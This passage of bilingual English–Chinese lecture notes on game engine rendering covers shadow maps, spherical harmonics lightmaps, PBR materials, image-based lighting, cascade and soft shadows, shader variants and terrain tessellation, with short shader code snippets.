    vec3 V = normalize(camera position - world position);
    vec3 R = reflect(v, N);
    FragColor = texture(cube texture, R);
    }

    Early stage exploration of image-based lighting

    ​基于图像的照明的早期探索

    Math Behind Light Combo

    ​光组合背后的数学

    webp

    • Main Light

      主光源

      • Dominant Light

        主光源

    • Ambient Light

      环境光

      • Low-frequency of irradiance sphere distribution

        低频辐照度球体分布

    • Environment Map

      环境贴图

      • High-frequency of irradiance sphere distribution

        高频辐照度球体分布

    Blinn-Phong Materials

    webp

    ​冯光照模型是个很经典的光照模型,虽然现在有点过时了。

    Problem of Blinn-Phong

    • Not energy conservative

      不符合能量守恒定律(可能越反射越亮)

      • Unstable in ray-tracing

        光线追踪不稳定

    webp

    Left non-energy conserving model lead a lot of noise compare Right energy conserving model

    ​左边的非节能模型与右边的节能模型相比会产生很多噪音

    • Hard to model complex realistic material

      难以模拟复杂材质(冯模型模拟出来都有一股塑料感)

    webp

    Shadow

    webp

    • Shadow is nothing but space when the light is blocked by an opaque object

      当光线被不透明物体阻挡时,阴影只不过是空间

    • Already obsolete method

      已经过时的方法

      • planar shadow

        平面阴影

      • shadow volume

        阴影体积

      • projective texture

        投影纹理

    Shadow Map

    ​Shadow Map 是计算机图形学中用于实现阴影的一种技术。它基于光线追踪的概念,将场景从光源的视角渲染到一个深度纹理贴图上,以便在后续的渲染中使用这个纹理来确定哪些表面处于阴影之中。

    ​计算出阴影贴图。用一张 texture 表示阴影。

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    // project our 3D position to the shadow map
    vec4 proj_pos = shadow viewproj * pos;
    // from homogeneous space to clip space
    vec2shadow_uv = proj_pos.xy / proj_pos.w;
    // from clip space to uv space
    shadow_uv = shadow_uv * 0.5 + vec2(0.5)
    // get point depth (from -1 to 1)
    float real_depth = proj_pos.z / proj_pos.w;
    // normalize from [-1..+1] to [0..+1]
    real_depth = real_depth * 0.5 + 0.5;
    // read depth from depth buffer in [0..+1]
    float shadow_depth = texture(shadowmap, shadow_uv).x;
    // compute final shadow factor by comparing
    float shadow_factor = 1.0;
    if(shadow_depth < real_depth)
    shadow_factor =0.0;

    Problem of Shadow Map

    webp

    Resolution is limited on texture

    ​分辨率受纹理限制

    webp

    Depth precision is limited in texture

    ​深度精度受到纹理的限制

    Basic Shading Solution

    • Simple light + Ambient

      简单光 + 环境光

      • dominent light solves No. 1b

        主光解决了第 1b 项挑战

      • ambient and EnvMap solves No.3 challanges

        环境光和 EnvMap 解决了第 3 项挑战

    • Blinn-Phong material

      • solve No.2 challange

        解决第 2 项挑战

    • Shadow map

      阴影贴图

      • solve No.1a challange

        解决第 1a 项挑战

    Cheap, Robust and Easy Modification

    ​便宜、鲁棒且易于修改

    First Wave of AAA Quality

    ​3A 游戏的渲染技术不断发展。

    Pre-computed Global Illumination

    ​用一个环境光常量来模拟其他物体反射出的所有光,减少计算。

    Why Global llumination is lmportant

    webp

    ​如果不考虑光的反射,大片面积将会一坨黑。

    How to Represent indirect Light

    webp

    • Good compression rate

      良好的压缩率

      • We need to store millions of radiance probes in a level

        我们需要在一个水平仪中存储数百万个辐射探头

    • Easy to do integration with material function

      易于与材料功能集成

      • Use polynomial calculation to convolute withmaterial BRDF

        使用多项式计算与材质 BRDF 进行卷积

    ​计算光照用到了下面数学工具:

    Fourier Transform

    webp

    $$f(x)=\frac{A}{2}+\frac{2A\cos(t\omega)}{\pi}-\frac{2A\cos(3t\omega)}{3\pi}+\frac{2A\cos(5t\omega)}{5\pi}-\frac{2A\cos(7t\omega)}{7\pi}+\cdots $$

    ​傅里叶变换让函数在时域和空域之间转换。

    Convolution Theorem

    webp

    ​引入傅里叶变换,让卷积速度更快!

    Spherical Harmonics

    ​球谐函数

    ​Spherical Harmonics(球谐函数)是一组用于描述球面上函数的数学函数系列。在计算机图形学中,球谐函数被广泛应用于光照和环境光的表示与计算。

    webp

    webp

    Spherical Harmonics, a mathematical system analogous to the Fourier transform but defined across the surface of a sphere. The SH functions in general are defined on imaginary numbers

    ​球谐函数,一种类似于傅立叶变换的数学系统,但定义在球体表面。SH 函数一般是根据虚数定义的

    Spherical Harmonics Encoding

    webp

    Sampling lrradiance Probe Anywhere

    webp

    Compress lrradiance Probe to SH1

    ​Lrradiance Probe(辐照度探针)是计算机图形学中用于捕捉和近似表示环境光照信息的技术。它通过在场景中放置一系列探针来采样场景中的辐照度(irradiance),并将这些采样结果存储起来,以便在渲染过程中使用。

    webp

    • Source lrradiance Probe

      光源辐照度探头

    • Compressed lrradiance Probe By SH1

      SH1 的压缩辐照度探头

    • Reconstruct lrradiance In Shader

      在着色器中重建光照度

    Store and Shading with SH

    Just RGBA8 color

    • Use 4 RGB textures to store 12 SH coefficients

      使用 4 个 RGB 纹理来存储 12 个 SH 系数

      • $L0$ coefficients in HDR (BC6H texture)

        HDR 中的 $L0$ 系数(BC6H 纹理)

      • $L1$ coefficients in LDR (3x Bc7 or BC1 textures)

        LDR 中的 $L1$ 系数(3x Bc7 或 BC1 纹理)

    • Total footprint for RGB SH lightmaps:

      RGB SH 光照贴图的总占用空间:

      • 32 bits (4 bytes)/texel for Bc6+Bc7, high quality mode

        Bc6+Bc7 32 位(4 字节)/texel,高质量模式

      • 20 bits (2.5 bytes) texel for Bc6+Bc1, low quality mode

        Bc6+Bc1 的 20 位(2.5 字节)纹理元素,低质量模式

    Simple diffuse shading

    webp

    SH Lightmap: Precomputed GI

    ​SH 光照贴图:预计算 GI

    ​空间换时间。

    ​SH Lightmap 是一种基于球谐函数(Spherical Harmonics)的光照贴图技术,可以用于近似表示场景中的光照信息。它通过将场景的光照信息转换为球谐系数并存储到贴图上,以便在渲染时快速计算每个片元的光照贡献。

    webp

    • Parameterized all scene into huge 2D lightmap atlas

      将所有场景参数化为巨大的 2D 光照图集

    • Using offline lighting farm to calculate irradiance probes for all surface points

      使用离线照明场计算所有表面点的辐照度探头

    • Compress those irradiance probes into SH coefficients

      将这些辐照度探头压缩为 SH 系数

    • Store SH coefficients into 2D atlas lightmap textures

      将 SH 系数存储到 2D 图集光照贴图纹理中

    Lightmap: UV Atlas

    webp

    Lightmap density

    ​光照贴图密度

    • Low-poly proxy geometry

      低多边形代理几何体

    • Fewer UV charts/islands

      更少的紫外线图表/岛屿

    • Fewer lightmap texels are wasted

      浪费的光照贴图纹理像素更少

    Lightmap: Lighing

    webp

    Indirect lighting, finalgeometry

    ​间接照明,最终几何

    • Project lightmap from proxiesto all LODs

      将光照贴图从代理投影到所有 LOD

    • Apply mesh details

      应用网格细节

    • Add short-range, high-frequency lighting detail by HBAO

      通过 HBAO 添加短距离、高频照明细节

    Lightmap: Lighting + Direct Lighting

    webp

    ​光照贴图:光照+直接光照

    Direct + indirect lighting, final geometry

    ​直接+间接照明,最终几何形状

    • Compute direct lighting dynamically

      动态计算直接照明

    Final Shading with Materials

    webp

    Final frame

    ​最终帧

    • Combined with materials

      与材质结合

    Lightmap

    • Pros

      优点

      • Very efficient on runtime

        运行时非常高效

      • Bake a lot of fine details of Gl on environment

        在环境上烘焙了 GL 的很多细节

    • Cons

      缺点

      • Long and expensive precomputation (lightmap farm)

        漫长而昂贵的预计算(光照贴图农场)

      • Only can handle static scene and static light

        只能处理静态场景和静态灯光

      • Storage cost on package and GPU

        包和 GPU 的存储成本

    Light Probe: Probes in Game Space

    webp

    Light Probe Point Generation

    webp

    Reflection Probe

    webp

    Light Probes + Reflection Probes

    • Pros

      优点

      • Very efficient on runtime

        运行时非常高效

      • Can be applied to both static and dynamic objects

        可应用于静态和动态对象

      • Handle both diffuse and specular shading

        处理漫反射和镜面反射着色

    • Cons

      缺点

      • A bunch of SH light probes need some precomputation

        一堆 SH 光探头需要一些预计算

      • Can not handle fine detail of Gl. l.e, soft shadow on overlapped structures

        无法处理 GL 的精细细节。即,重叠结构上的软阴影。

    Physical-Based Material

    Microfacet Theory

    ​微平面理论。

    webp

    BRDF Model Based on Microfacet

    ​基于 Microfacet 的 BRDF 模型

    webp

    Normal Distribution Function

    webp

    $$f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}$$

    $$NDF_{GGX}(n,h,\alpha)=\frac{\alpha^{2}}{\pi\left((n\cdot h){2}(\alpha{2}-1)+1\right)^{2}}$$

    Geometric Attenuation Term (self-shadowing)

    ​在计算机图形学中,几何衰减项(self-shadowing)是指在渲染过程中考虑物体自身阴影对光照效果的影响。当光线射向一个物体表面时,如果该表面的某些部分被遮挡,这些被遮挡的部分就会处于阴影之中,从而无法直接受到光的照射,导致其表面变暗。

    ​几何衰减项通常用于模拟光线在渲染过程中如何与物体表面相互作用,从而影响最终的光照结果。这种效应特别明显的情况是当光源和观察者之间有障碍物时,如一个物体投射的阴影落在自身表面上。

    ​几何衰减项可以通过各种方式来实现,其中一种常见的方式是使用阴影映射(shadow mapping)技术。在阴影映射中,首先从光源的视角渲染场景,并将渲染结果保存在一个深度贴图(depth map)中。然后,对于每个像素,通过比较深度贴图中的深度值来确定该像素是否在阴影之中。如果某个像素被深度贴图中的深度值所遮挡,那么该像素就被认为处于阴影之中,从而进行相应的颜色调整,实现几何衰减效果。

    webp

    $$\begin{gathered}
    f_{CookTorrance}=\frac{DFG}{4(\omega_o\cdot n)(\omega_i\cdot n)} \
    G_{Smith}(l,\nu)=G_{GGX}(l)\cdot G_{GGX}(\nu) \
    G_{GGX}(\nu)=\frac{n\cdot\nu}{(n\cdot\nu)(1-k)+k}\quad k=\frac{(\alpha+1)^{2}}{8}
    \end{gathered}$$

    1
    2
    3
    4
    5
    6
    7
    8
    // Geometry Term: Geometry masking/shadowing due to microfacets
    float GGr(float Ndotv, float k) {
    return Ndotv / (Ndotv * (1.0 - k) + k);
    }
    float G_Smith(float Ndotv, float NdotL, float roughness) {
    float k = pow(roughness + 1.0, 2.0) / 8.0;
    return GGX(NdotL, k) * GGr(Ndotv, k);
    }

    Fresnel Equation

    ​当视角接近反射平面时,反射率会急剧上升。

    webp

    $$\begin{aligned}&f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}\&F_{Schlick}(h,\nu,F_{0})=F_{0}+(1-F_{0})\left(1-(\nu\cdot h)\right)^{5}\end{aligned}$$

    ​这个 5 次方是数学家推导出来的。

    1
    2
    3
    4
    5
    // Fresnel term with scalar optimization
    float F Schlick(float VoH, float f0) {
    float f = pow(1.0 - VoH, 5.0);
    return f0 + (1.0 - f0) * f;
    }

    Physical Measured Material

    webp

    MERL BRDF Database of measured materials

    ​这个数据集测量了各种材质的数据。

    Disney Principled BRDF

    Principles to follow when implementing model:

    ​实施模型时应遵循的原则:

    • Intuitive rather than physical parameters should be used

      应使用直观参数而不是物理参数

    • There should be as few parameters as possible

      参数应该尽可能少

    • Parameters should be zero to one over their plausible range

      参数在其合理范围内应为 0 到 1

    • Parameters should be allowed to be pushed beyond their plausible range where it makes sense

      应允许参数超出其合理范围

    • All combinations of parameters should be as robust and plausible as possible

      所有参数组合应尽可能稳健且合理

    Disney Principle Material Parameters

    ​Disney Principled BRDF 是迪士尼(Disney)开发的一种基于物理的渲染表面模型,用于在计算机图形学中模拟材质的外观。BRDF 是 Bidirectional Reflectance Distribution Function 的缩写,用于描述光线从表面反射的方式。Disney Principled BRDF 将多个常见的渲染表面模型(如 Lambert、Blinn-Phong、Cook-Torrance 等)融合成一个单一的、参数化的模型,使得艺术家和技术人员可以更简单地控制材质的外观,并且更好地满足物理真实性的要求。

    ​Disney Principled BRDF 的主要特点和参数包括:

    1. 基础颜色(Base Color): 表示表面的颜色,即在没有其他光照影响的情况下表面的颜色。

    2. 金属度(Metallic): 表示表面是否具有金属质感。金属度为 0 表示非金属材质,金属度为 1 表示完全是金属材质。

    3. 粗糙度(Roughness): 表示表面的光滑程度。粗糙度为 0 表示表面非常光滑,反射光线呈现清晰的镜面反射,而粗糙度为 1 表示表面非常粗糙,反射光线呈现模糊的散射。

    4. 法线(Normal): 表示表面的法线方向,用于模拟表面的微观凹凸结构。

    5. 环境遮挡(Ambient Occlusion): 用于模拟光线在表面附近的阴影效果,增强表面的立体感。

      Disney Principled BRDF 的优点在于它简化了材质创建的流程,减少了需要调整的参数数量,同时也更符合物理真实性。通过调整基础颜色、金属度和粗糙度等参数,可以实现多种不同类型材质的外观,包括金属材质、塑料、玻璃等。

      这种模型的广泛应用使得它成为了许多计算机图形学软件和引擎中的标准渲染模型之一,例如 Pixar 的 RenderMan、Blender 内置的 Cycles 渲染引擎等。

    webp

    PBR Specular Glossiness

    ​Specular Glossiness(高光光泽度)是一种用于描述材质表面反射特性的属性。它通常被用于渲染引擎和材质编辑器中,用于控制物体表面的光泽程度以及高光的大小和清晰度。

    webp

    webp

    PBR Metallic Roughness

    ​Metallic Roughness 是一种用于描述材质外观的参数化模型,通常用于计算机图形学中的渲染。它是 Disney Principled BRDF 中的两个主要参数之一,用于控制材质的金属度和粗糙度,从而影响表面的反射和散射行为。

    1. 金属度(Metallic): 这个参数表示表面材质的金属属性程度。金属度为 0 表示非金属材质,例如塑料、木材等,而金属度为 1 表示完全是金属材质,例如铁、铜等。金属材质具有较强的镜面反射特性,因此在光照下会产生清晰的高光反射,而非金属材质则通常具有更多的漫反射。
    2. 粗糙度(Roughness): 这个参数表示表面的光滑程度。粗糙度为 0 表示表面非常光滑,反射光线呈现清晰的镜面反射,而粗糙度为 1 表示表面非常粗糙,反射光线呈现模糊的散射。具有较高粗糙度的表面会导致光线在各个方向上散射,产生柔和的光照效果,而较低粗糙度的表面则会产生更锐利的反射光线。

    webp

    Covert MR to SG

    webp

    PBR Pipeline MR vs SG

    webp

    MR

    • Pros

      • Can be easier to author and less prone to errors caused by supplying incorrect dielectric F0 data

        可以更轻松地编写,并且不易因提供不正确的介电 F0 数据而导致错误

      • Uses less texture memory, as metallic and roughness are both grayscale maps

        使用更少的纹理内存,因为金属和粗糙度都是灰度图

    • Cons

      • No control over F0 for dielectrics in map creation. However, most implementations have a specular control to override thebase 4% value

        在创建地图时无法控制电介质的 F0。然而,大多数实现都有镜面反射控制来覆盖 4% 的基本值

      • Edge artifacts are more noticeable, especially at lowerresolutions

        边缘伪影更加明显,尤其是在较低分辨率下

    SG

    • Pros

      • Edge artifacts are less apparent

        边缘伪影不太明显

      • Control over dielectric F0 in the specular map

        控制镜面反射图中的电介质 F0

    • Cons

      • Because the specular map provides control over dielectric F0, it is more susceptible to use of incorrect values. lt is possible to break the law of conservation if handled incorrectly in the shader

        由于镜面反射贴图提供对电介质 F0 的控制,因此更容易使用不正确的值。如果在着色器中处理不当,可能会违反守恒定律

      • Uses more texture memory with an additional RGB map

        使用更多纹理内存和额外的 RGB 贴图

    Image-Based Lighting (IBL)

    Basic Idea of IBL

    ​IBL(Image-Based Lighting)是一种计算机图形学中常用的光照技术,用于模拟真实世界中的光照效果。它基于图像的方式来描述光照信息,通过对环境中的光照进行捕捉和处理,来为场景中的物体赋予逼真的光照效果。

    ​IBL 的基本原理是利用环境贴图(Environment Map)来模拟环境中的光照。环境贴图通常是一个球形或立方体贴图,捕捉了环境中的光照信息,包括天空、周围物体的反射等。这些贴图可以是基于真实场景拍摄的全景图像,也可以是通过计算得到的环境光照信息。

    webp

    • An image representing distant lighting from alldirections.

      代表来自各个方向的远处照明的图像。

    • How to shade a point under the lighting?

      如何在灯光下对点进行着色?

      Solving the rendering equation:

      求解渲染方程:

      $L_{o}(x,\omega_{o})=\int_{H^{2}}f_{r}(x,\omega_{o},\omega_{i})L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i}$

    • Using Monte Carlo integration

      使用蒙特卡罗积分

      Large amount of sampling-Slow!

      采样量大-慢!

    webp

    Recall BRDF Function

    $$L_{o}(\boldsymbol{x},\omega_{o})=\int_{H^{2}}f_{r}(\boldsymbol{x},\omega_{o},\omega_{i})L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i}\f_{r}=k_{d}f_{Lambert}+f_{CookTorrance}$$

    • $f_{Lambert}$ diffuse
    • $f_{CookTorrance}$ specular

    $$\begin{aligned}
    L_{o}(x,\omega_{o})& =\int_{H^{2}}(k_{d}f_{Lambert}+f_{CookTorance})L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i} \
    &=\int_{H{2}}k_{d}f_{Lambert}L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i}+\int_{H{2}}f_{CookTorrances}L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i} \
    &=L_d(x,\omega_o)+L_s(x,\omega_o)
    \end{aligned}$$

    Diffuse Irraiance Map

    • Irraiance Map

    webp

    Specular Approximation

    webp

    Approximation: part (1/2)

    webp

    Approximation: part (2/2)

    webp

    Quick Shading with Precomputation

    ​通过预计算进行快速着色

    webp

    Shading PBR with IBL

    ​加入环境贴图后,效果更加真实。

    webp

    Classic Shadow Solution

    Big World and Cascade Shadow

    webp

    • Partition the frustum into multiple frustums

      将视锥体划分为多个视锥体

    • A shadow map is rendered for each sub frustum

      为每个子视锥体渲染阴影贴图

    • The pixel shader then samples from the map that most closely matches the required resolution

      像素着色器然后从与所需分辨率最匹配的贴图中进行采样

    Steps of Cascade Shadow

    ​层叠影阶

    ​Cascade Shadow Mapping(级联阴影映射)是一种用于实时渲染中实现高质量阴影的技术。它被广泛应用于游戏引擎和其他实时渲染应用程序中,以提供更逼真的场景光照效果。

    ​Cascade Shadow Mapping 的基本思想是将场景中的光源视锥体(例如平行光源的视锥体)分成多个不同分辨率的子区域,每个子区域被称为一个级联(cascade)。然后,为每个级联计算一个独立的深度贴图(depth map),用于记录从光源视角下每个像素到场景中可见点的距离。

    ​通常,级联的数量和分辨率会根据距离光源的远近而动态调整,以确保远处的物体能够得到足够高的深度分辨率,从而减少阴影的锯齿状边缘(aliasing),同时避免过度消耗资源。通常情况下,近处级联具有更高的分辨率,而远处级联具有较低的分辨率。

    ​一旦每个级联的深度贴图都准备好了,就可以在渲染阴影的阶段使用它们。具体来说,对于每个要接受阴影的像素,都会根据其在世界空间中的位置和光源的视角来计算其在每个级联深度贴图中的深度值。然后,通过比较每个像素的深度值与相应级联深度贴图中的深度值,就可以确定像素是否在阴影中。

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    splitFrustumToSubfrusta();
    calculateOrthoProjectionsForEachSubfrustum();
    renderShadowMapForEachSubfrustum();
    renderScene();

    vs_main() {
    calculateWorldPosition()
    }

    ps_main() {
    transformWorldPositionsForEachProjections()
    sampleAllShadowMaps()
    compareDepthAndLightingPixel()
    ...
    }

    Blend between Cascade Layers

    ​级联层之间的混合

    webp

    1. A visible seam can be seen where cascades overlap

      级联重叠处可以看到明显的接缝

    2. between cascade layers because the resolution does not match

      级联层之间因为分辨率不匹配

    3. The shader then linearly interpolates between the two values based on the pixel’s location in the blend band

      然后,着色器根据像素在混合带中的位置在两个值之间进行线性插值

    Pros and Cons of Cascade Shadow

    • Pros

      • best way to prevalent errors with shadowing: perspective aliasing

        解决阴影常见错误的最佳方法:透视锯齿

      • fast to generate depth map, 3x up when depth writing only

        快速生成深度图,仅深度写入时提高 3 倍

      • provide fairly good results

        提供相当好的结果

    • Cons

      • Nearly impossible to generate high quality area shadows

        几乎不可能生成高质量的区域阴影

      • No colored shadows. Translucent surfaces cast opaque shadows

        没有彩色阴影。半透明表面投射不透明阴影

    Hard Shadow vs Realistic Shadow

    webp

    PCF - Percentage Closer Filter

    ​PCF - 百分比接近过滤器

    ​PCF(Percentage Closer Filter)是一种用于改善阴影质量的技术,特别是在阴影映射中使用。它的目的是减少阴影边缘的锯齿(aliasing),使阴影更加柔和和逼真。

    ​阴影映射通常会生成一个深度贴图(depth map),用于记录从光源视角下到场景中各个点的距离。在渲染场景时,为了确定一个像素是否在阴影中,通常会比较场景中的点与光源的深度值。然而,简单地使用深度比较可能会导致锯齿状边缘,特别是在阴影投射到接近相机的表面上时。

    ​PCF 解决了这个问题。它通过对深度贴图中的深度值进行多次采样,并计算每次采样时像素与深度值的关系,以确定像素是否在阴影中。这些采样通常是在深度贴图的附近进行的,并且通常是在一个较小的范围内。这样,即使像素与阴影边缘接近,也能够准确地检测出阴影的存在,从而减少锯齿状边缘的问题。

    webp

    • Target problem

      目标问题

      • The shadows that result from shadow mapping aliasing is serious

        阴影贴图锯齿导致的阴影很严重

    • Basic idea

      基本思想

      • Sample from the shadow map around the current pixel and compare its depth to all the samples

        从当前像素周围的阴影贴图进行采样,并将其深度与所有样本进行比较

      • By averaging out the results we get a smoother line between light and shadow

        通过对结果进行平均,我们可以得到光影之间更平滑的线条

    PCSS - Percentage Closer Soft Shadow

    ​PCSS - 百分比接近软阴影

    ​Percentage Closer Soft Shadow(PCSS)是一种用于实时渲染中生成柔和阴影的技术。它是 Percentage Closer Filter(PCF)的一种变体,旨在在阴影边缘产生更加柔和和逼真的效果。

    ​PCSS 通过在每个像素处进行多个样本的深度比较,并根据深度比较结果和光源距离来计算阴影的柔和度。与传统的硬阴影相比,PCSS 考虑了阴影边缘周围的光线传播和遮挡,以模拟真实世界中光线的衍射和散射效应。

    PCSS 的实现通常包括以下步骤:

    1. 生成阴影贴图(Shadow Map): 首先,生成场景的深度贴图,用于记录从光源视角下到场景中各个点的距离。
    2. 多样本采样: 在渲染阶段,对于每个要接受阴影的像素,进行多个样本的深度比较。这些样本通常位于阴影边缘周围,并且可以通过多次采样来模拟光线的传播。
    3. 计算柔和阴影: 根据每个样本的深度比较结果以及光源与表面的距离,计算阴影的柔和度。通常,较远离光源的像素会产生较宽的阴影区域,而较接近光源的像素会产生较窄的阴影区域。
    4. 混合阴影: 将多个样本的阴影值进行加权平均,以获得最终的柔和阴影结果。这样可以使阴影边缘呈现出逐渐变化的过渡效果,减少锯齿状边缘。

    webp

    • Target problem

      目标问题

      • Suffers from aliasing and under sampling artifacts

        存在混叠和采样不足的问题

    • Basic idea

      基本思想

      • Search the shadow map and average the depths that are closer to the light source

        搜索阴影贴图并平均靠近光源的深度

      • Using a parallel planes approximation

        使用平行平面近似

    Variance Soft Shadow Map

    webp

    • Target problem

      目标问题

      • Rendering plausible soft shadow in real-time

        实时渲染合理的软阴影

    • Basic idea

      基本思想

      • Based on Chebyshev’s inequality, using the average and variance of depth, we can approximate the percentage of depth distribution directly instead of comparing a single depth to a particular region (PCSS)

        基于切比雪夫不等式,使用深度的平均值和方差,我们可以直接近似深度分布的百分比,而不是将单个深度与特定区域进行比较(PCSS)

    ​目前 3A 渲染广泛用到的技术:

    • Lightmap + Light probe
    • PBR + IBL
    • Cascade shadow + VSSM

    Moving Wave of High Quality

    Quick Evolving of GPU

    ​得益于 GPU 的发展,计算能力不断增强。

    • More flexible new shader model

      更灵活的新着色器模型

      • Compute shader

        计算着色器

      • Mesh shader

        网格着色器

      • Ray-tracing shader

        光线追踪着色器

    • High performance parallel architecture

      高性能并行架构

      • Warp or wave architecture

        扭曲或波浪结构

    • Fully opened graphics APl

      完全开放的图形 APl

      • DirectX 12 and Vulkan

        DirectX 12 和 Vulkan

    Real-Time Ray-Tracing on GPU

    webp

    ​新的 GPU 支持实时光线追踪。

    Real-Time Global lllumination

    webp

    More Complex Material Model

    webp

    Virtual Shadow Maps

    webp

    Shader Management

    Ocean of Shaders

    ​大游戏里用到的 Shader 非常多。

    Blow of Shaders

    ​要求在每帧中渲染场景中的多个 shader。

    Artist Create infinite More Shaders

    ​艺术家创造无限更多的着色器

    Uber Shader and Variants

    ​Uber 着色器和变体

    A combination of shader for all possible light types, render passes and material types

    ​适用于所有可能的灯光类型、渲染通道和材质类型的着色器组合

    • Shared many state and codes

      共享许多状态和代码

    • Compile to many variant short shaders by pre-defined macro

      通过预定义宏编译为许多变体短着色器

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // sky light
    #if ENABLE SKY LIGHT
    #if MATERIAL TWOSIDED && LQ_TEXTURE_LIGHTMAP
    if(NoL == 0) {
    #endif

    #if MATERIAL_SHADINGMODEL_SINGLELAYERWATER
    ShadingModelContext.WaterDiffuseIndirectLuminance += SkyDiffuselighting;
    #endif

    Color += SkyDiffuselighting * half3(ResolvedView.SkylightColor.rgb) * ShadingModelContext.DiffuseColor * MaterialA0;
    #if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
    }
    #endif
    #endif

    Shader Variants Example In Real Game

    ​真实游戏中的着色器变体示例

    webp

    ​一大堆。为了降低耦合性,每个 shader 都是单独存在的。

    Cross Platform Shader Compile

    webp

    ​写 shader 也演变出了一堆语言!

    第六节(上):游戏中地形大气和云的渲染

    ​MD 天书……

    Rendering on Game Engine

    The Challenges and Fun of Rendering the Beautiful Mother Nature

    ​渲染美丽大自然的挑战和乐趣

    Real-World Landscape

    webp

    • Huge geospatial scale

      巨大的地理空间尺度

    • Rich geomorphological

      地貌丰富

      • Vegetation

        植被

      • Rivers

        河流

      • Undulating peaks

        起伏的山峰

      • Alpine snow

        高山雪

    Too Complex for Rendering Using Traditional Mesh + Material

    ​使用传统网格 + 材质渲染过于复杂

    Environment Components in Games

    webp

    Simple Idea - Heightfield

    webp

    Height Map

    ​高度图

    Contour Map

    ​等高线图

    • Satellite image and google earth

      卫星图像和谷歌地球

    Expressive Heightfield Terrains

    ​富有表现力的高度场地形

    Render Terrain with Heightfield

    ​使用高度场渲染地形

    webp

    Adaptive Mesh Tessellation

    ​自适应网格细分

    webp

    ​fov 内的网格密集,外的不密集。

    Two Golden Rules of Optimization

    ​两条优化黄金法则

    webp

    View-dependent error bound

    ​视图相关的错误界限

    • Distance to camera and FoV

      到相机和 FoV 的距离

    • Error compare to ground truth (pre-computation)

      与真实情况相比的误差(预计算)

    Triangle-Based Subdivision

    ​基于三角形的细分

    webp

    Subdivision and T-Junctions

    ​T-Junctions(T 字连接)是在计算机图形学中用于描述三角形网格连接关系的术语。当两个或多个三角形共享一个边时,它们在连接点形成了 T 字型的结构。这种连接在三维网格模型的拓扑结构中相当常见。

    ​T-Junctions 通常出现在网格的边缘、拐角或交叉点附近。它们可能会出现在几何体的建模、网格编辑、或者在进行几何操作(如网格合并、分割、细分等)时。在渲染阶段,T-Junctions 可能会导致一些问题,尤其是在基于三角形的图形渲染中,因为它们可能会导致不正确的图形拓扑和渲染结果。

    webp

    Continuously partitioning triangles and their children based on the idea of binary trees

    ​基于二叉树的思想连续划分三角形及其子节点

    Triangle-Based Subdivision on GPU

    webp

    54 x 54km terrarin on GPU using Unity game engine

    ​根据 GPU 架构设计的算法。

    QuadTree-Based Subdivision

    ​基于四叉树的细分

    webp

    Pros

    • Easy to construct

      易于建造

    • Easy management of data under geospatial, including objects culling and data streaming

      轻松管理地理空间下的数据,包括对象剔除和数据流

    Cons

    • Mesh subdivision is not as flexible as triangle mesh

      网格细分不如三角形网格灵活

    • The grid level of the leaf nodes needs to be consistent

      叶子节点的网格层级需要一致

    webp

    Solving T-Junctions among Quad Grids

    ​求解四边形网格之间的 T 型连接点

    webp

    Terrain Rendering with Quad Grid

    ​使用四网格进行地形渲染

    Triangulated lrregular Network (TlN)

    ​不规则三角网络 (TlN)

    webp

    Density Variants in TlN

    ​TlN 中的密度变量

    webp

    Triangulated lrregular Network vs. Adpative Tessellation

    ​不规则三角网络与自适应曲面细分

    webp

    Pros

    • Easy in runtime rendeirng

      易于运行时渲染

    • Less triangls in certain terrain types

      某些地形类型中的三角形较少

    webp

    Cons

    • Requires certain pre-processing steps

      需要一定的预处理步骤

    • Poor reusability

      可重用性差

    GPU-Based Tessellation

    ​基于 GPU 的曲面细分

    webp

    Hardware Tesselation

    ​硬件曲面细分

    webp

    Hul-Shader Stage - transforms basis functions from base mesh to surface patches

    Hul-Shader Stage - 将基础函数从基础网格转换为表面补丁

    Tessellator Stage - produces a semi-regular tessellation pattern for each patch

    Tessellator Stage - 为每个补丁生成半规则的镶嵌图案

    Domain-Shader Stage - a programmable shader stage that calculates the vertex position that corresponds to each domain sample

    Domain-Shader Stage - 一个可编程着色器阶段,用于计算与每个域样本对应的顶点位置

    webp

    Mesh Shader Pipeline

    webp

    • Amplification Shader Stage - decides how many Mesh shader groups to run and passes data to those groups

      放大着色器阶段 - 决定运行多少个网格着色器组并将数据传递到这些组

    • Mesh Shader Stage - produces a semi-regulartessellation pattern for each patch, and outputscomprise vertices and primitives

      网格着色器阶段 - 为每个补丁生成半规则曲面细分图案,输出包含顶点和图元

    Real-Time Deformable Terrain

    webp

    ​在游戏运行时,地表模型会改变(如车压路上)

    Dig a Hole in Terrain

    webp

    ​给地表挖洞。

    Crazy ldea - Volumetric Representation

    ​疯狂的想法-体积表示

    webp

    In 3D computer graphics, a voxel represents a value on a regular grid in three-dimensional space. As pixels in a 2D bitmap, voxels themselves do not typically have their position (i.e. coordinates) explicitly encoded with their values

    ​在 3D 计算机图形学中,体素表示三维空间中规则网格上的值。作为 2D 位图中的像素,体素本身通常不会使用其值显式编码其位置(即坐标)

    Marching Cubes

    ​行进立方体

    webp

    MARCHING CUBES: A HIGH RESOLUTION 3D SURFACE CONSTRUCTION ALGORITHM', Computer Graphics, volume 21, Number 4, July 1987

    ​给模型作切片。

    Transition Cell Lookup Table

    ​过渡单元查找表

    webp

    webp

    Transvoxel Algorithm

    ​跨体素算法

    • Constructs the triangulation of transition cells to form a lookup table, and uses this lookup table to do the triangulation of LOD voxel cubes

      构造过渡单元的三角剖分以形成查找表,并使用该查找表进行 LOD 体素立方体的三角剖分

    Make AAA as Flexible as Minecraft??? :-)

    ​我的世界是一个自由度很高的游戏,目前 3A 大作很难对场景环境做出改变。

    Terrain Materials

    webp

    ​一个 Terrain 往往包含多种 Materials。

    Simple Texture Splatting

    ​简单的纹理喷溅

    webp

    1
    2
    3
